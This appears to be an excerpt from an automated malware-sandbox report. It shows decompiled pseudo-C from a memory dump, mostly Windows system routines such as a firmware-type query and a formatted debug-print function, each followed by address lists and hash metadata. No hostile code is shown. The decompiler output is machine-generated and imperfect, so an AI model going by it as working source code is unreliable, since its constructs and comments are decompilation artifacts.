					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E00ADEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E00B453CA(0);
						return E00B1D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E00B0F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E00AE3690(1, _t117, 0xaa1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E00B0AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L00AE4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E00B0AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E00B4500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E00B09860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                                                        0x00b451be
                                                                                                        0x00b451c3
                                                                                                        0x00b451c8
                                                                                                        0x00b451cd
                                                                                                        0x00b451d0
                                                                                                        0x00b451d3
                                                                                                        0x00b451d8
                                                                                                        0x00b451db
                                                                                                        0x00b451de
                                                                                                        0x00b451e0
                                                                                                        0x00b451e3
                                                                                                        0x00b451e6
                                                                                                        0x00b451e8
                                                                                                        0x00b45342
                                                                                                        0x00b45351
                                                                                                        0x00b45356
                                                                                                        0x00b4535a
                                                                                                        0x00b45360
                                                                                                        0x00b45363
                                                                                                        0x00b45366
                                                                                                        0x00b45369
                                                                                                        0x00b45369
                                                                                                        0x00b4536b
                                                                                                        0x00b4536b
                                                                                                        0x00b45370
                                                                                                        0x00b453a3
                                                                                                        0x00b453a4
                                                                                                        0x00b453a6
                                                                                                        0x00b453ab
                                                                                                        0x00b453ab
                                                                                                        0x00b453ae
                                                                                                        0x00b453ae
                                                                                                        0x00b453b5
                                                                                                        0x00b453bf
                                                                                                        0x00b453bf
                                                                                                        0x00b45375
                                                                                                        0x00b45396
                                                                                                        0x00b453a0
                                                                                                        0x00b453a0
                                                                                                        0x00000000
                                                                                                        0x00b45396
                                                                                                        0x00b45377
                                                                                                        0x00b45379
                                                                                                        0x00b4537f
                                                                                                        0x00b4538c
                                                                                                        0x00b45390
                                                                                                        0x00000000
                                                                                                        0x00b45390
                                                                                                        0x00b451ee
                                                                                                        0x00b451f1
                                                                                                        0x00b45301
                                                                                                        0x00b45310
                                                                                                        0x00b45315
                                                                                                        0x00b45318
                                                                                                        0x00b4531b
                                                                                                        0x00b45320
                                                                                                        0x00b4532e
                                                                                                        0x00b45331
                                                                                                        0x00000000
                                                                                                        0x00b45331
                                                                                                        0x00b45328
                                                                                                        0x00b45329
                                                                                                        0x00000000
                                                                                                        0x00b45329
                                                                                                        0x00b451fa
                                                                                                        0x00b45235
                                                                                                        0x00b45236
                                                                                                        0x00b45239
                                                                                                        0x00b4523f
                                                                                                        0x00b45240
                                                                                                        0x00b45241
                                                                                                        0x00b45242
                                                                                                        0x00b45246
                                                                                                        0x00b45247
                                                                                                        0x00b4524e
                                                                                                        0x00b45251
                                                                                                        0x00b45267
                                                                                                        0x00b45269
                                                                                                        0x00b4526e
                                                                                                        0x00b4527d
                                                                                                        0x00b4527e
                                                                                                        0x00b45281
                                                                                                        0x00b45282
                                                                                                        0x00b45287
                                                                                                        0x00b45288
                                                                                                        0x00b4528a
                                                                                                        0x00b4528f
                                                                                                        0x00b45294
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b4529a
                                                                                                        0x00b4529c
                                                                                                        0x00b4529e
                                                                                                        0x00b4529e
                                                                                                        0x00b452a4
                                                                                                        0x00b452b0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b452ba
                                                                                                        0x00b452bc
                                                                                                        0x00b452bc
                                                                                                        0x00b452d4
                                                                                                        0x00b452d9
                                                                                                        0x00b452dc
                                                                                                        0x00b452e1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b452e7
                                                                                                        0x00b452f4
                                                                                                        0x00000000
                                                                                                        0x00b452f4
                                                                                                        0x00b45270
                                                                                                        0x00000000
                                                                                                        0x00b45270
                                                                                                        0x00b451fc
                                                                                                        0x00b451fd
                                                                                                        0x00b45202
                                                                                                        0x00b45203
                                                                                                        0x00b45205
                                                                                                        0x00b4520a
                                                                                                        0x00b4520f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b4521b
                                                                                                        0x00b45226
                                                                                                        0x00b4522b
                                                                                                        0x00b4521d
                                                                                                        0x00b4521d
                                                                                                        0x00b45222
                                                                                                        0x00b45222
                                                                                                        0x00b4522d
                                                                                                        0x00000000

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: Legacy$UEFI
                                                                                                        • API String ID: 2994545307-634100481
                                                                                                        • Opcode ID: 88857d5ab994edd7388406ead1197ce319814866d1ca85985e9f1810cf9fe108
                                                                                                        • Instruction ID: ec31f8d59fe8956e5976f836a6c8468396936c817845670d221e60430afcab38
                                                                                                        • Opcode Fuzzy Hash: 88857d5ab994edd7388406ead1197ce319814866d1ca85985e9f1810cf9fe108
                                                                                                        • Instruction Fuzzy Hash: EC516171A00B189FDB24DFA8C980AADBBF4FF48740F1440ADE546EB292D7719E40DB54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00ACB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 78%
                                                                                                        			E00ACB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0xb9f7a8);
				E00B1D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E00B1D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E00B0D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E00B0F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L00B1DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E00B0B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E00B0B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E00B0E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E00B0A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                                                        0x00acb171
                                                                                                        0x00acb171
                                                                                                        0x00acb171
                                                                                                        0x00acb171
                                                                                                        0x00acb171
                                                                                                        0x00acb176
                                                                                                        0x00acb17b
                                                                                                        0x00acb180
                                                                                                        0x00acb186
                                                                                                        0x00acb18f
                                                                                                        0x00acb198
                                                                                                        0x00acb1a4
                                                                                                        0x00acb1aa
                                                                                                        0x00b24802
                                                                                                        0x00b24802
                                                                                                        0x00b24805
                                                                                                        0x00b2480c
                                                                                                        0x00b2480e
                                                                                                        0x00acb1d1
                                                                                                        0x00acb1d3
                                                                                                        0x00acb1de
                                                                                                        0x00acb1de
                                                                                                        0x00b24817
                                                                                                        0x00b2481e
                                                                                                        0x00b24820
                                                                                                        0x00b24822
                                                                                                        0x00b24822
                                                                                                        0x00b24824
                                                                                                        0x00b24824
                                                                                                        0x00b2482a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b24835
                                                                                                        0x00b2483a
                                                                                                        0x00b2483d
                                                                                                        0x00b2483f
                                                                                                        0x00b24842
                                                                                                        0x00b24842
                                                                                                        0x00b24842
                                                                                                        0x00b24846
                                                                                                        0x00b2484c
                                                                                                        0x00b2484e
                                                                                                        0x00b24851
                                                                                                        0x00b24851
                                                                                                        0x00b24853
                                                                                                        0x00b24854
                                                                                                        0x00b24854
                                                                                                        0x00b24858
                                                                                                        0x00b2485a
                                                                                                        0x00b2485a
                                                                                                        0x00b2485d
                                                                                                        0x00b2485f
                                                                                                        0x00b24861
                                                                                                        0x00b24861
                                                                                                        0x00b24866
                                                                                                        0x00b2486b
                                                                                                        0x00b2486e
                                                                                                        0x00b24871
                                                                                                        0x00b24876
                                                                                                        0x00b24876
                                                                                                        0x00b24878
                                                                                                        0x00b2487b
                                                                                                        0x00b24884
                                                                                                        0x00b24884
                                                                                                        0x00000000
                                                                                                        0x00b2487d
                                                                                                        0x00b2487d
                                                                                                        0x00b24882
                                                                                                        0x00b24889
                                                                                                        0x00b24889
                                                                                                        0x00b2488f
                                                                                                        0x00b24891
                                                                                                        0x00b248e0
                                                                                                        0x00b248e2
                                                                                                        0x00b248e4
                                                                                                        0x00b248e4
                                                                                                        0x00b248e7
                                                                                                        0x00b248e7
                                                                                                        0x00b248ed
                                                                                                        0x00b248f4
                                                                                                        0x00b248f6
                                                                                                        0x00b24951
                                                                                                        0x00b24951
                                                                                                        0x00b24953
                                                                                                        0x00b24953
                                                                                                        0x00b24956
                                                                                                        0x00b24956
                                                                                                        0x00b24958
                                                                                                        0x00b24959
                                                                                                        0x00b24959
                                                                                                        0x00b2495d
                                                                                                        0x00b2495d
                                                                                                        0x00b2495f
                                                                                                        0x00b2495f
                                                                                                        0x00b24965
                                                                                                        0x00b24969
                                                                                                        0x00b249ba
                                                                                                        0x00b249ba
                                                                                                        0x00b249c1
                                                                                                        0x00b249c5
                                                                                                        0x00b249cc
                                                                                                        0x00b249d4
                                                                                                        0x00b249d7
                                                                                                        0x00b249da
                                                                                                        0x00b249e4
                                                                                                        0x00b249e5
                                                                                                        0x00b249f3
                                                                                                        0x00b24a02
                                                                                                        0x00000000
                                                                                                        0x00b24a02
                                                                                                        0x00b24972
                                                                                                        0x00b24974
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b24976
                                                                                                        0x00b24979
                                                                                                        0x00b24982
                                                                                                        0x00b24983
                                                                                                        0x00b24984
                                                                                                        0x00b2498b
                                                                                                        0x00b2498d
                                                                                                        0x00b24991
                                                                                                        0x00b24993
                                                                                                        0x00b24999
                                                                                                        0x00b2499d
                                                                                                        0x00b249a2
                                                                                                        0x00b249a2
                                                                                                        0x00b249a2
                                                                                                        0x00b24999
                                                                                                        0x00b249ac
                                                                                                        0x00000000
                                                                                                        0x00b249b3
                                                                                                        0x00b248f8
                                                                                                        0x00b248fe
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b248fe
                                                                                                        0x00b24895
                                                                                                        0x00b2489c
                                                                                                        0x00b248ad
                                                                                                        0x00b248b2
                                                                                                        0x00b248b5
                                                                                                        0x00b248b7
                                                                                                        0x00b248ba
                                                                                                        0x00b248bc
                                                                                                        0x00b248c6
                                                                                                        0x00b248c6
                                                                                                        0x00b248cb
                                                                                                        0x00b248d1
                                                                                                        0x00b248d4
                                                                                                        0x00b248d8
                                                                                                        0x00b248d8
                                                                                                        0x00000000
                                                                                                        0x00b248d8
                                                                                                        0x00b248be
                                                                                                        0x00b248c0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b248c2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b248c4
                                                                                                        0x00000000
                                                                                                        0x00b24882
                                                                                                        0x00b2487b
                                                                                                        0x00b24904
                                                                                                        0x00b24906
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b24908
                                                                                                        0x00b2490e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b24910
                                                                                                        0x00b24917
                                                                                                        0x00b24917
                                                                                                        0x00000000
                                                                                                        0x00b24917
                                                                                                        0x00acb1ba
                                                                                                        0x00b247f9
                                                                                                        0x00b247fc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b247fc
                                                                                                        0x00acb1c0
                                                                                                        0x00acb1c0
                                                                                                        0x00acb1c3
                                                                                                        0x00acb1cb
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: _vswprintf_s
                                                                                                        • String ID:
                                                                                                        • API String ID: 677850445-0
                                                                                                        • Opcode ID: 562b9debe601327dcc7977aeeead2aa2ed3341a373f4bd91cc2f46d457dfe5db
                                                                                                        • Instruction ID: 2d526ccf5bdca96868b595032dfeea2018f7d13d660c86c5871add4170be6c6a
                                                                                                        • Opcode Fuzzy Hash: 562b9debe601327dcc7977aeeead2aa2ed3341a373f4bd91cc2f46d457dfe5db
                                                                                                        • Instruction Fuzzy Hash: 5351CD71D202698EDF21CF649845BAEBBF0EF04710F2142EDE859ABA82D7714D858B91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AEB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 76%
                                                                                                        			E00AEB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0xbbd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E00AE7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E00B98CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E00B09E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E00B0B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E00B0CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E00AE7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E00B98F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E00B0AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0xbb8628; // 0x0
								_v68 = _t77;
								_t78 =  *0xbb862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0xbb8628; // 0x0
							_t116 =  *0xbb862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                                                        0x00aeb94c
                                                                                                        0x00aeb956
                                                                                                        0x00aeb95c
                                                                                                        0x00aeb95e
                                                                                                        0x00aeb964
                                                                                                        0x00aeb969
                                                                                                        0x00aeb96d
                                                                                                        0x00aeb96d
                                                                                                        0x00aeb970
                                                                                                        0x00aeb974
                                                                                                        0x00aeb97a
                                                                                                        0x00aebadf
                                                                                                        0x00aebadf
                                                                                                        0x00aebae2
                                                                                                        0x00aebae4
                                                                                                        0x00aebae6
                                                                                                        0x00aebaf0
                                                                                                        0x00b32cb8
                                                                                                        0x00aebaf6
                                                                                                        0x00aebaf6
                                                                                                        0x00aebaf6
                                                                                                        0x00aebafd
                                                                                                        0x00aebb1f
                                                                                                        0x00aebb1f
                                                                                                        0x00aebaff
                                                                                                        0x00aebb00
                                                                                                        0x00aebb00
                                                                                                        0x00aebb03
                                                                                                        0x00aebb03
                                                                                                        0x00aebacb
                                                                                                        0x00aebacf
                                                                                                        0x00aebad0
                                                                                                        0x00aebad1
                                                                                                        0x00aebadc
                                                                                                        0x00aebadc
                                                                                                        0x00aeb980
                                                                                                        0x00aeb980
                                                                                                        0x00aeb988
                                                                                                        0x00aeb98b
                                                                                                        0x00aeb98d
                                                                                                        0x00aeb990
                                                                                                        0x00aeb993
                                                                                                        0x00aeb999
                                                                                                        0x00aeb99b
                                                                                                        0x00aeb9a1
                                                                                                        0x00aeb9a5
                                                                                                        0x00aeb9aa
                                                                                                        0x00aeb9b0
                                                                                                        0x00aeb9bb
                                                                                                        0x00aeb9c0
                                                                                                        0x00aeb9c3
                                                                                                        0x00aeb9ca
                                                                                                        0x00aeb9cc
                                                                                                        0x00aeb9cf
                                                                                                        0x00aeb9d3
                                                                                                        0x00aeb9d7
                                                                                                        0x00aeba94
                                                                                                        0x00aeba94
                                                                                                        0x00aeba98
                                                                                                        0x00aebaa3
                                                                                                        0x00b32ccb
                                                                                                        0x00aebaa9
                                                                                                        0x00aebaa9
                                                                                                        0x00aebaa9
                                                                                                        0x00aebab1
                                                                                                        0x00b32cd5
                                                                                                        0x00b32cdd
                                                                                                        0x00b32cdd
                                                                                                        0x00aebabb
                                                                                                        0x00aebabc
                                                                                                        0x00aebac2
                                                                                                        0x00aebac3
                                                                                                        0x00aebac3
                                                                                                        0x00aebac6
                                                                                                        0x00000000
                                                                                                        0x00aeb9dd
                                                                                                        0x00aeb9dd
                                                                                                        0x00aeb9e7
                                                                                                        0x00aeb9e7
                                                                                                        0x00aeb9ec
                                                                                                        0x00aeb9ec
                                                                                                        0x00aeb9f1
                                                                                                        0x00aeb9f5
                                                                                                        0x00aeb9fa
                                                                                                        0x00aeba00
                                                                                                        0x00aeba0c
                                                                                                        0x00aeba10
                                                                                                        0x00aeba10
                                                                                                        0x00aeba12
                                                                                                        0x00aeba18
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00aebb26
                                                                                                        0x00aebb26
                                                                                                        0x00aeba1e
                                                                                                        0x00aeba1e
                                                                                                        0x00aeba23
                                                                                                        0x00aeba25
                                                                                                        0x00aeba2c
